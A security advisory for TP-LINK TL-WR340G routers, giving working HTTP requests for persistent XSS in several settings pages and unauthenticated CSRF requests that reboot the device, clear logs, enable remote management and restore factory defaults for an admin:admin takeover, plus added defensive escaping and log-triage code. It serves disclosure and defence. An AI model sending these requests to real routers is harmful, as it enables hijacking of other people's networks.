#Title: TP-LINK Model No. TL-WR340G/TL-WR340GD - Multiple Vulnerabilities
#Date: 01.07.14
#Vendor: TP-LINK
#Affected versions: TL-WR340G/TL-WR340GD
#Tested on: Firmware Version - 4.3.7 Build 090901 Rel.61899n, Hardware Version - WR340G v5 081520C2 [at] Linux
#Contact: smash [at] devilteam.pl
Persistent Cross Site Scripting vulnerabilities exist because of poor parameter filtering. The submitted value is stored in a JavaScript array; since it is neither verified nor filtered, JavaScript code can be injected, and it is executed whenever a user visits the specific settings page. Because there is no CSRF prevention, the router can be compromised: an attacker may force the user to restore factory default settings and then turn on remote management, after which it is possible to log in using the default username and password (admin:admin).
Config file - 192.168.1.1/userRpm/config.bin
#1 - Cross Site Scripting
a) Persistent XSS in Network > WAN Settings
Vulnerable parameter - hostName.
Request:
GET /userRpm/WanDynamicIpCfgRpm.htm?wantype=Dynamic+IP&hostName=%3C/script%3E%3Cscript%3Ealert(123)%3C/script%3E&mtu=1500&Save=Save HTTP/1.1
Host: 192.168.1.1
Response:
HTTP/1.1 200 OK
Server: Router
Connection: close
Content-Type: text/html
WWW-Authenticate: Basic realm="TP-LINK Wireless Router WR340G"
<SCRIPT language="javascript" type="text/javascript">
var dhcpInf = new Array(
1,
(...)
"</script><script>alert(123)</script>",
0,0 );
</SCRIPT>
(...)
b) Persistent XSS in Wireless Settings
Vulnerable parameter - ssid.
Request:
GET /userRpm/WlanNetworkRpm.htm?ssid=%3C%2Fscript%3Exssed%3C%3E&region=102&channel=6&mode=2&ap=2&broadcast=2&secType=1&secOpt=3&keytype=1&key1=&length1=0&key2=&length2=0&key3=&length3=0&key4=&length4=0&Save=Save HTTP/1.1
Host: 192.168.1.1
Response:
HTTP/1.1 200 OK
Server: Router
Connection: close
Content-Type: text/html
WWW-Authenticate: Basic realm="TP-LINK Wireless Router WR340G"
<SCRIPT language="javascript" type="text/javascript">
var wlanPara = new Array(
5, 0, "</script>xssed<>", 114, 102, 1, 6, 2, 1, 1, 0, "", "", "", "", "", "", 0, 1, "333", 1, "11", 1, "0.0.0.0", 1812, "", "", 86400, 86400, 1,
0,0 );
</SCRIPT>
(...)
c) Persistent XSS in DHCP Settings
Vulnerable parameter - domain.
Request:
GET /userRpm/LanDhcpServerRpm.htm?dhcpserver=1&ip1=192.168.1.100&ip2=192.168.1.199&Lease=120&gateway=0.0.0.0&domain=</script><xssed>'"&dnsserver=0.0.0.0&dnsserver2=0.0.0.0&Save=Save HTTP/1.1
Host: 192.168.1.1
Referer: http://192.168.1.1/userRpm/LanDhcpServerRpm.htm
Response:
HTTP/1.1 200 OK
Server: Router
Connection: close
Content-Type: text/html
WWW-Authenticate: Basic realm="TP-LINK Wireless Router WR340G"
<SCRIPT language="javascript" type="text/javascript">
var DHCPPara = new Array(
1,
"192.168.1.100",
"192.168.1.199",
120,
"0.0.0.0",
"</script><xssed>'\"",
"0.0.0.0",
"0.0.0.0",
1,
1,
0,0 );
</SCRIPT>
(...)
d) Persistent XSS in Security > Domain Filtering
Vulnerable parameter - domain; the value is validated only by client-side JavaScript to reject illegal characters in a domain name. This check can be bypassed by sending the raw HTTP request.
Request:
GET /userRpm/DomainFilterRpm.htm?begintime=0000&endtime=2400&domain=hm</script><xssed>'"&State=1&Changed=1&SelIndex=0&Page=1&Save=Save HTTP/1.1
Host: 192.168.1.1
Response:
HTTP/1.1 200 OK
Server: Router
Connection: close
Content-Type: text/html
WWW-Authenticate: Basic realm="TP-LINK Wireless Router WR340G"
<SCRIPT language="javascript" type="text/javascript">
var domainFilterList = new Array(
"0000-2400", "hm</script><xssed>'\"", 1,
0,0 );
</SCRIPT>
(...)
e) Persistent XSS in Dynamic DNS Settings
Vulnerable parameters - username & cliUrl.
Request:
GET /userRpm/DynDdnsRpm.htm?provider=2&username=&pwd=&cliUrl=</script><script>alert(123)</script>&Save=Save HTTP/1.1
Host: 192.168.1.1
Response:
HTTP/1.1 200 OK
Server: Router
Connection: close
Content-Type: text/html
WWW-Authenticate: Basic realm="TP-LINK Wireless Router WR340G"
<SCRIPT language="javascript" type="text/javascript">
var serInf = new Array(
"",
"",
"</script><script>alert(123)</script>",
0,
0,
2,
2,
0,
1,
0,0 );
</SCRIPT>
(...)
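Every vulnerable page above writes the stored value into an inline JavaScript array, and the responses show the router escaping only the double quote (`'\"`) while leaving `</script>` intact; the HTML parser closes the script element before the JavaScript engine ever sees the string literal. The following is an added example, not code from the advisory or from TP-LINK's firmware, contrasting that router-style escaping with a serializer that keeps the value inert inside `<script>`; the array name `DHCPPara` and the payloads are taken from the responses above.

```javascript
// Added example, not from the advisory: embedding a user-controlled value in an
// inline <script> array (the pattern every vulnerable page above uses) without
// letting it close the script element.

// What the responses show the router doing: escape the double quote only. The
// HTML parser sees "</script>" before the JavaScript engine runs, so the string
// literal boundaries never matter.
function routerStyleLiteral(value) {
  return '"' + String(value).replace(/"/g, '\\"') + '"';
}

// Hardened: JSON.stringify handles quotes, backslashes and control characters;
// then <, >, & and the JS line terminators U+2028/U+2029 become \uXXXX escapes,
// which the JavaScript engine decodes back to the original characters.
function jsStringLiteral(value) {
  return JSON.stringify(String(value)).replace(/[<>&\u2028\u2029]/g, (ch) =>
    "\\u" + ch.charCodeAt(0).toString(16).padStart(4, "0"));
}

function renderArray(name, values, literal = jsStringLiteral) {
  const items = values.map((v) => (typeof v === "number" ? String(v) : literal(v)));
  return `var ${name} = new Array(${items.join(", ")});`;
}

// True when the generated statement would end the <script> element early.
function containsScriptBreakout(statement) {
  return /<\/script/i.test(statement) || /<!--/.test(statement);
}

// Run the statement as the browser would once it sits inside an intact
// <script> element, and return the array it defines.
function evalRendered(statement, name) {
  return new Function(`${statement} return ${name};`)();
}

// Payloads quoted in the advisory's responses.
const PAYLOADS = ["</script><script>alert(123)</script>", "</script><xssed>'\""];

function demo() {
  return PAYLOADS.map((p) => ({
    routerBreaksOut: containsScriptBreakout(renderArray("DHCPPara", [1, p], routerStyleLiteral)),
    hardenedBreaksOut: containsScriptBreakout(renderArray("DHCPPara", [1, p])),
    roundTrip: evalRendered(renderArray("DHCPPara", [1, p]), "DHCPPara")[1] === p,
  }));
}
```

The round trip shows the hardened form loses nothing: the SSID or hostname comes back byte for byte, it just cannot become markup.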
#2 - CSRF
a) Change LAN IP
The lanip parameter holds the new LAN IP address.
GET /userRpm/NetworkLanCfgRpm.htm?lanip=192.168.1.2&lanmask=255.255.255.0&Save=Save HTTP/1.1
Host: 192.168.1.1
b) Change remote management settings
GET /userRpm/ManageControlRpm.htm?port=80&ip=0.0.0.0&Save=Save HTTP/1.1
Host: 192.168.1.1
c) Clear syslog
GET /userRpm/SystemLogRpm.htm?Clearlog=Clear+All HTTP/1.1
Host: 192.168.1.1
d) Reboot device
GET /userRpm/SysRebootRpm.htm?Reboot=Reboot HTTP/1.1
Host: 192.168.1.1
e) Restore factory defaults (admin:admin)
GET /userRpm/RestoreDefaultCfgRpm.htm?Restorefactory=Restore HTTP/1.1
Host: 192.168.1
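Each of the requests above changes configuration through a plain GET with no token, so a forged request from a lure page looks identical to a legitimate one except for where the browser says it came from. The following is an added example, not from the advisory, that triages combined-format access log lines for state-changing `/userRpm/` requests whose Referer is absent or points off the router; the log lines are constructed for illustration, and the router address 192.168.1.1 and the parameter names come from the requests above.

```javascript
// Added example, not from the advisory: flag state-changing /userRpm/ requests
// whose Referer is missing or off-router, the shape a forged cross-site request
// would have. Assumes combined log format; sample lines are constructed.
const ROUTER_HOSTS = new Set(["192.168.1.1"]); // LAN address used in the advisory
// Query parameters the advisory shows on the configuration-changing pages.
const STATE_CHANGING = ["Save", "Reboot", "Restorefactory", "Clearlog"];

const LOG_RE =
  /^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) \S+ "([^"]*)" "([^"]*)"$/;

function parseLogLine(line) {
  const m = LOG_RE.exec(line);
  if (!m) return null;
  return { ip: m[1], time: m[2], method: m[3], path: m[4], status: Number(m[5]), referer: m[6] };
}

// A request changes state when it targets /userRpm/ and carries one of the
// action parameters; a bare page view (no query) is read-only.
function isStateChanging(path) {
  const q = path.indexOf("?");
  if (!path.startsWith("/userRpm/") || q < 0) return false;
  const params = new URLSearchParams(path.slice(q + 1));
  return STATE_CHANGING.some((name) => params.has(name));
}

function refererHost(referer) {
  if (!referer || referer === "-") return null;
  try { return new URL(referer).hostname; } catch { return null; }
}

function flagCsrfCandidates(lines) {
  const flagged = [];
  for (const line of lines) {
    const entry = parseLogLine(line);
    if (!entry || !isStateChanging(entry.path)) continue;
    const host = refererHost(entry.referer);
    if (host === null || !ROUTER_HOSTS.has(host)) flagged.push({ ...entry, refererHost: host });
  }
  return flagged;
}

// Constructed sample: one legitimate save, one save from a foreign page, one
// remote-management change with no Referer, one read-only page view.
const SAMPLE_LOG = [
  '192.168.1.50 - - [01/Jul/2014:10:00:01 +0200] "GET /userRpm/LanDhcpServerRpm.htm?dhcpserver=1&Save=Save HTTP/1.1" 200 512 "http://192.168.1.1/userRpm/LanDhcpServerRpm.htm" "Mozilla/5.0"',
  '192.168.1.50 - - [01/Jul/2014:10:02:13 +0200] "GET /userRpm/RestoreDefaultCfgRpm.htm?Restorefactory=Restore HTTP/1.1" 200 220 "http://lure.example/page.html" "Mozilla/5.0"',
  '192.168.1.50 - - [01/Jul/2014:10:02:14 +0200] "GET /userRpm/ManageControlRpm.htm?port=80&ip=0.0.0.0&Save=Save HTTP/1.1" 200 300 "-" "Mozilla/5.0"',
  '192.168.1.50 - - [01/Jul/2014:10:05:00 +0200] "GET /userRpm/SystemLogRpm.htm HTTP/1.1" 200 900 "http://192.168.1.1/userRpm/MenuRpm.htm" "Mozilla/5.0"',
];
```

A missing Referer is a triage signal rather than proof, since browsers and privacy settings strip it for legitimate requests too; the fix on the router side is a per-session anti-CSRF token and state changes over POST, which this log check does not replace.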